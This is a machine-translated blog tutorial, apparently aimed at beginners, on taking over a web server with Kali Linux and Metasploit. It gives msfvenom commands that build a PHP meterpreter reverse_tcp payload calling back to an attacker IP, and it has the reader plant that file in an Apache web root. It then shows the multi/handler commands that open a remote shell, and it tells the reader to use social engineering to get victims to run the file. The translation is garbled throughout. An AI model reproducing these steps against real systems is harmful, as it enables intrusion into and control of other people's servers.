current position:Home>Yyds dry goods inventory network security, website security and computer security: how does Xiaobai use Kali Linux to obtain the operation authority of web website server [i]

Yyds dry goods inventory network security, website security and computer security: how does Xiaobai use Kali Linux to obtain the operation authority of web website server [i]

2022-01-27 00:29:19 Kali and programming

One 、 Background introduction

Metasploit Is a network security framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own scripts , To test .Metasploit(msf) How powerful it is ? How to use the wood code to control the victim's host ? Now let's learn !​

Two 、 Resources and equipment

1. Install well Win7 A virtual machine of

2. Xiaobai, who is ready to go .

3. Installed Kali Linux One virtual machine .

3、 ... and 、 Safety drill

3.1 Send the victim to the host (Windows7) With the controller host (Kali Linux) All network modes are set to NAT Pattern , As shown in the figure below .

step : Open the virtual machine settings / Choose a network adapter / choice NAT Pattern .

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_linux

3.2 Check the of the two hosts in the experiment IP Address , As shown in the figure below .

command :ifconfig

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_ Network security _02

3.3 utilize “msfvenom” The wood code generation tool generates the corresponding wood code file , As shown in the figure below .

step 1:msfvenom Introduction to the parameters of the tool

-p, –payload < payload> Specify the payload load . You can also use custom payload, It supports almost all platforms

-o, –out < path> Specify the created payload Storage location of .

-h, –help See help options .

step 2: utilize msfvenom The tool generates the corresponding wood code file , As shown in the figure below .

command :msfvenom -p Specify the payload load lhost= Controller host IP -f exe > Save location of the generated wood code file

Example :msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_kali_03

step 3: Find out whether the corresponding wood code file has been generated under the directory of the known wood code file saving path , As shown in the figure below , The wood code file already exists ( Here, a graphical file management system is used to view , You can also use ls Command to check whether the corresponding wood code file has been generated under the corresponding path ).

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_ social engineering _04

3.4 Using certain social engineering methods, the generated wood code file is sent to the target victim host , And run on the victim's host ( For the corresponding social engineering knowledge, please continue to pay attention to this number , Follow up explanation ), As shown in the figure below .

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_kali_05

3.5 install “phpstudy Integrated environment ”, As shown in the figure below .

step 1: open “phpstudy” Choose the software version corresponding to your computer system on the official website to download .

step 2: Installation precautions

1. The installation path cannot contain “ chinese ” perhaps “ Space ”, Otherwise, an error will be reported ( For example, error prompts :Can't change dir to 'G:\\x65b0\x5efa\x6587\)

2. Make sure the installation path is clean , You cannot have installed in the installation path V8 edition , If you reinstall , Please choose another path

step 3:phpstudy Official tutorial , Take it by yourself .

website :https://www.php.cn/course/1066.html

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_linux_06


3.6 After installing the corresponding software , start-up phpstudy Environment in , As shown in the figure below .

step 1: Click the start button next to the corresponding environment to start .

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_kali_07 

step 2: Get into apache service , As shown in the figure below .

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_ social engineering _08

3.7 Upload the corresponding wood code file to apache Service www Under the table of contents , As shown in the figure below .

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_kali_09

3.8 start-up Metasploit(msf) frame , As shown in the figure below .

command 1:msfconsole

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_ Network security _10 

command 2:use exploit/multi/handler

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_linux_11

command 3:set payload php/meterpreter/reverse_tcp

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_linux_12

command 4:show options

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_ Computer _13

command 5:set lhost 192.168.78.168

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_linux_14

command 6:run( Boot module )

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_kali_15

3.9 Get the of the target host server shell, As shown in the figure below .

command :shell Get into shell page .

#yyds Dry inventory # Network security, website security and computer security : How does Xiaobai use Kali Linux obtain WEB Web server operation permission 【 On 】_kali_16

 ​ Point to my major Kali Linux Safety technology ​

copyright notice
author[Kali and programming],Please bring the original link to reprint, thank you.
https://en.cdmana.com/2022/01/202201270029168771.html

Random recommended